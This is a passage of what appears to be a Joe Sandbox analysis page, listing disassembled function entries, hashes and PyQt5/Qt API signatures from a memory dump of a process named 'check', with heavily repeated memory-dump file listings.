                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742588047.00007FF89DB38000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742620970.00007FF89DB3A000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742676190.00007FF89DB45000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742709268.00007FF89DB51000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742742292.00007FF89DB57000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742786406.00007FF89DB58000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742830626.00007FF89DB6C000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742865069.00007FF89DB6D000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742896875.00007FF89DB6E000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742928215.00007FF89DB70000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ?tabletEvent@Event@@@TabletWindow@@
                                                                                                                                                                                                                                          • String ID: BJ8$QWindow$keyReleaseEvent$keyReleaseEvent(self, a0: Optional[QKeyEvent])
                                                                                                                                                                                                                                          • API String ID: 2314446140-729342036
                                                                                                                                                                                                                                          • Opcode ID: 701dea9e4a784fdf985712df24456802574a69349d5242750e633da4472325d6
                                                                                                                                                                                                                                          • Instruction ID: e04b795b69c62b320a137079d072c1e5c99d7c5d2101b3c5e197d36e18f03188
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 701dea9e4a784fdf985712df24456802574a69349d5242750e633da4472325d6
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1921F773A09B46C6EA208B15E48526A73A4FB84FC4F444132EACE47724EF3CE155C748
                                                                                                                                                                                                                                          Function 00007FF89D971F20 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 56COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742030889.00007FF89D930000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742215970.00007FF89DA5B000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742369525.00007FF89DB18000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742408105.00007FF89DB1A000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742472955.00007FF89DB1E000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742507094.00007FF89DB26000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742542378.00007FF89DB32000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742588047.00007FF89DB38000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742620970.00007FF89DB3A000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742676190.00007FF89DB45000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742709268.00007FF89DB51000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742742292.00007FF89DB57000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742786406.00007FF89DB58000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742830626.00007FF89DB6C000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742865069.00007FF89DB6D000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742896875.00007FF89DB6E000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742928215.00007FF89DB70000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ?tabletEvent@Event@@@TabletWindow@@
                                                                                                                                                                                                                                          • String ID: BJ8$QWindow$moveEvent$moveEvent(self, a0: Optional[QMoveEvent])
                                                                                                                                                                                                                                          • API String ID: 2314446140-1045797905
                                                                                                                                                                                                                                          • Opcode ID: a7617255fdf9bf3af23644da2a4fcc1b8770496e7a209aac20a3b2a7836fbfe5
                                                                                                                                                                                                                                          • Instruction ID: da97e1b70e349443dfdbf218854790fccd62152b7703eed7c4879c7317c41db2
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a7617255fdf9bf3af23644da2a4fcc1b8770496e7a209aac20a3b2a7836fbfe5
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 73210833A08B46C6EA609B15E48426A73E4FB84FD8F445132EACE47768EF3CE055C708
                                                                                                                                                                                                                                          Function 00007FF89D933A00 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 53COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • ?fill@?$QVector@VQPointF@@@@QEAAAEAV1@AEBVQPointF@@H@Z.QT5CORE ref: 00007FF89D933A9E
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742030889.00007FF89D930000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742215970.00007FF89DA5B000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742369525.00007FF89DB18000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742408105.00007FF89DB1A000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742472955.00007FF89DB1E000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742507094.00007FF89DB26000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742542378.00007FF89DB32000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742588047.00007FF89DB38000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742620970.00007FF89DB3A000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742676190.00007FF89DB45000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742709268.00007FF89DB51000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742742292.00007FF89DB57000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742786406.00007FF89DB58000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742830626.00007FF89DB6C000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742865069.00007FF89DB6D000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742896875.00007FF89DB6E000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742928215.00007FF89DB70000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Point$?fill@?$F@@@@Vector@
                                                                                                                                                                                                                                          • String ID: BJ1|i$QPolygonF$fill$fill(self, value: Union[QPointF, QPoint], size: int = -1)
                                                                                                                                                                                                                                          • API String ID: 1109879416-2067450826
                                                                                                                                                                                                                                          • Opcode ID: d9f7ddd6f8110688b49c34efcbfce030b29cf21c6c9043cacf0f4ecdb21b0407
                                                                                                                                                                                                                                          • Instruction ID: cec67748cde260a904b652fa364a8586c52a3a97979ba6f578875af0dcb9a2cc
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d9f7ddd6f8110688b49c34efcbfce030b29cf21c6c9043cacf0f4ecdb21b0407
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5931E677A08B45C5EB208B15E8892A933A8FB48BD0F914136DAAE43720EF39E559C704
                                                                                                                                                                                                                                          Function 00007FF89D9B80B0 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 51COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                            • Part of subcall function 00007FF89DA59D18: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF89D9312CB), ref: 00007FF89DA59D32
                                                                                                                                                                                                                                          • ?getAxisAndAngle@QQuaternion@@QEBAXPEAVQVector3D@@PEAM@Z.QT5GUI ref: 00007FF89D9B811A
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742030889.00007FF89D930000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742215970.00007FF89DA5B000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742369525.00007FF89DB18000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742408105.00007FF89DB1A000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742472955.00007FF89DB1E000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742507094.00007FF89DB26000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742542378.00007FF89DB32000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742588047.00007FF89DB38000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742620970.00007FF89DB3A000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742676190.00007FF89DB45000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742709268.00007FF89DB51000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742742292.00007FF89DB57000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742786406.00007FF89DB58000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742830626.00007FF89DB6C000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742865069.00007FF89DB6D000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742896875.00007FF89DB6E000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742928215.00007FF89DB70000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ?getAngle@AxisQuaternion@@Vector3malloc
                                                                                                                                                                                                                                          • String ID: (Nf)$QQuaternion$getAxisAndAngle$getAxisAndAngle(self) -> (Optional[QVector3D], Optional[float])
                                                                                                                                                                                                                                          • API String ID: 1106653836-2133363933
                                                                                                                                                                                                                                          • Opcode ID: f7500f8db1349cdf1623e14b636283c3f31b8091470a7acb06b22ecdefdb5d1f
                                                                                                                                                                                                                                          • Instruction ID: fcc55b1df0a7741b28baa1d76ab72737ce28333ab7812fec63fc7043ac9b986a
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f7500f8db1349cdf1623e14b636283c3f31b8091470a7acb06b22ecdefdb5d1f
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B5211D73A18B4681EB108F12E8455A973A5FB89FD0F918136DA9E47324EF3CE595C704
                                                                                                                                                                                                                                          Function 00007FF89D96C090 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 51COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                            • Part of subcall function 00007FF89DA59D18: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF89D9312CB), ref: 00007FF89DA59D32
                                                                                                                                                                                                                                          • ?mapBetween@QScreen@@QEBA?AVQRect@@W4ScreenOrientation@Qt@@0AEBV2@@Z.QT5GUI ref: 00007FF89D96C137
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742030889.00007FF89D930000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742215970.00007FF89DA5B000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742369525.00007FF89DB18000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742408105.00007FF89DB1A000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742472955.00007FF89DB1E000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742507094.00007FF89DB26000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742542378.00007FF89DB32000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742588047.00007FF89DB38000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742620970.00007FF89DB3A000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742676190.00007FF89DB45000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742709268.00007FF89DB51000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742742292.00007FF89DB57000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742786406.00007FF89DB58000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742830626.00007FF89DB6C000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742865069.00007FF89DB6D000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742896875.00007FF89DB6E000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742928215.00007FF89DB70000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ?mapBetween@Orientation@Qt@@0Rect@@ScreenScreen@@V2@@malloc
                                                                                                                                                                                                                                          • String ID: BEEJ9$QScreen$mapBetween$mapBetween(self, a: Qt.ScreenOrientation, b: Qt.ScreenOrientation, rect: QRect) -> QRect
                                                                                                                                                                                                                                          • API String ID: 3281288664-3086348255
                                                                                                                                                                                                                                          • Opcode ID: 66aa9b6b2549de9cd797f79221c3f70c2b7a0243343f30667b2c830d24613ddf
                                                                                                                                                                                                                                          • Instruction ID: 061c10c2e9f4255d0a8f2809a95bc7700fe9a798a02dd853785df976786af344
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 66aa9b6b2549de9cd797f79221c3f70c2b7a0243343f30667b2c830d24613ddf
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A8211937B19B4685EB60CB11E8887AD33A5FB48BD0F814036DA9E43320EF39E558C704
                                                                                                                                                                                                                                          Function 00007FF89D943E30 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 50COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • ?setMetaInformation@QTextDocument@@QEAAXW4MetaInformation@1@AEBVQString@@@Z.QT5GUI ref: 00007FF89D943EBA
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742030889.00007FF89D930000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742215970.00007FF89DA5B000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742369525.00007FF89DB18000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742408105.00007FF89DB1A000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742472955.00007FF89DB1E000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742507094.00007FF89DB26000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742542378.00007FF89DB32000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742588047.00007FF89DB38000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742620970.00007FF89DB3A000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742676190.00007FF89DB45000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742709268.00007FF89DB51000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742742292.00007FF89DB57000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742786406.00007FF89DB58000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742830626.00007FF89DB6C000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742865069.00007FF89DB6D000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742896875.00007FF89DB6E000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742928215.00007FF89DB70000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Meta$?setDocument@@Information@Information@1@String@@@Text
                                                                                                                                                                                                                                          • String ID: BEJ1$QTextDocument$setMetaInformation$setMetaInformation(self, info: QTextDocument.MetaInformation, a1: Optional[str])
                                                                                                                                                                                                                                          • API String ID: 3406236903-1039641548
                                                                                                                                                                                                                                          • Opcode ID: ac4b1720f9af7e75dc21068a104acbe94c541f9d8b24ce939c47056ec13968d1
                                                                                                                                                                                                                                          • Instruction ID: 4ccdf268a79e6cebd30ec421a1234d5a6984218aad78cb04953fe919066c3da8
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ac4b1720f9af7e75dc21068a104acbe94c541f9d8b24ce939c47056ec13968d1
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: BA21E677A08B45C5DB608F11E8893A933A4FB48BD0F918136DA9E43720EF3DE559C744
                                                                                                                                                                                                                                          Function 00007FF89D935DF0 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 48COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • ?replace@?$QVector@VQPointF@@@@QEAAXHAEBVQPointF@@@Z.QT5CORE ref: 00007FF89D935E6C
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742030889.00007FF89D930000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742215970.00007FF89DA5B000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742369525.00007FF89DB18000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742408105.00007FF89DB1A000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742472955.00007FF89DB1E000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742507094.00007FF89DB26000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742542378.00007FF89DB32000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742588047.00007FF89DB38000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742620970.00007FF89DB3A000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742676190.00007FF89DB45000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742709268.00007FF89DB51000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742742292.00007FF89DB57000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742786406.00007FF89DB58000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742830626.00007FF89DB6C000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742865069.00007FF89DB6D000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742896875.00007FF89DB6E000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742928215.00007FF89DB70000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Point$?replace@?$F@@@F@@@@Vector@
                                                                                                                                                                                                                                          • String ID: BiJ1$QPolygonF$replace$replace(self, i: int, value: Union[QPointF, QPoint])
                                                                                                                                                                                                                                          • API String ID: 281403271-4285370836
                                                                                                                                                                                                                                          • Opcode ID: 2f44a110847179e5deaf9e7bc812a81226b385e10047e951bab38ec6fd08784f
                                                                                                                                                                                                                                          • Instruction ID: a0b0fd9a9ffef6f915b1ced6a7c8080fdae797ac81ec25b0e1dd57c748ea5596
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2f44a110847179e5deaf9e7bc812a81226b385e10047e951bab38ec6fd08784f
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D9210337A19B46C5DB20CF11E8891A933A4FB88BD4F924136DA9E43320EF39E959C744
                                                                                                                                                                                                                                          Function 00007FF89D941FE0 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 47COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742030889.00007FF89D930000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742215970.00007FF89DA5B000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742369525.00007FF89DB18000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742408105.00007FF89DB1A000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742472955.00007FF89DB1E000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742507094.00007FF89DB26000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742542378.00007FF89DB32000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742588047.00007FF89DB38000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742620970.00007FF89DB3A000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742676190.00007FF89DB45000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742709268.00007FF89DB51000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742742292.00007FF89DB57000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742786406.00007FF89DB58000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742830626.00007FF89DB6C000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742865069.00007FF89DB6D000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742896875.00007FF89DB6E000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742928215.00007FF89DB70000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
